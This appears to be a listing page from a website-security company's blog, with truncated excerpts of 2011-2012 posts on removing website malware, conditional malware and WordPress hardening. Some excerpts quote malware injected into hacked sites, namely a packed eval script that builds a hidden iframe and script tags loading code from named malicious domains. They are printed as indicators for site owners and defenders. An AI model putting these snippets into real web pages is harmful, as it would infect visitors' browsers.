This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info, he loves twitter (when its up). It seems every day we’re combating malicious redirections. Often, they are simple, but everyday they are evolving, and in some instances become [...]
Website Malware Removal – Counter.php
July 18, 2012 by Leave a Comment
There are many variations to the Counter.php malware floating around the interwebs. This is a malicious redirect that sends your readers to a known bad site, that site houses a payload that responds based on the incoming user-agent. Malicious Site: natbushing.com Payload: counter.php Check out Sucuri Labs for more variations of Counter.php If you use [...]
Website Malware Removal – Blackhole Exploit
July 14, 2012 by Leave a Comment
Here is a quick little write up on how to to deal with one, of many variations, of the Blackhole Exploit. The Infection If you scan your site using Sucuri SiteCheck and find yourself with a result that looks like this: Then you are dealing with an infection that is facilitated through the use of [...]
Understanding Conditional Malware – IP Centric Variation
June 21, 2012 by
In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware. As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as [...]
How To: Stop The Hacker By Hardening WordPress
June 19, 2012 by
Every day we service 100′s of clients and the question is always asked: How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
Partnerships: Sucuri & ClickHOST.com
June 12, 2012 by
Since April 2012, ClickHOST.com and Sucuri have been enjoying a symbiotic relationship. The two partnered in an attempt to offer cost-effective services to their clients. The family team at ClickHOST.com has recognized the need to get ahead of the web malware problem and understands that its not ok to simply shut down a site or [...]
New Malware – eval(function(p,a,c,k,e,d)
November 4, 2011 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware (using Dean Edwards packer). This is what is gets added to the hacked sites: <script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’ \b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0); .. 9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732′.split(‘|’),0,{})) And that code (once decoded by the browser) is used to [...]
SQL injections: nbnjkl.com/urchin.js and jjghui.com/urchin.js
October 13, 2011 by
We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection). This is how it shows on a hacked site: <script src= http://nbnjkl.com/urchin.js ></script> We posted full details [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware update – Timthumb.php and .htaccess redirection
August 21, 2011 by
We have been very busy in our blog explaining about the latest TimThumb.php vulnerability and the affect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
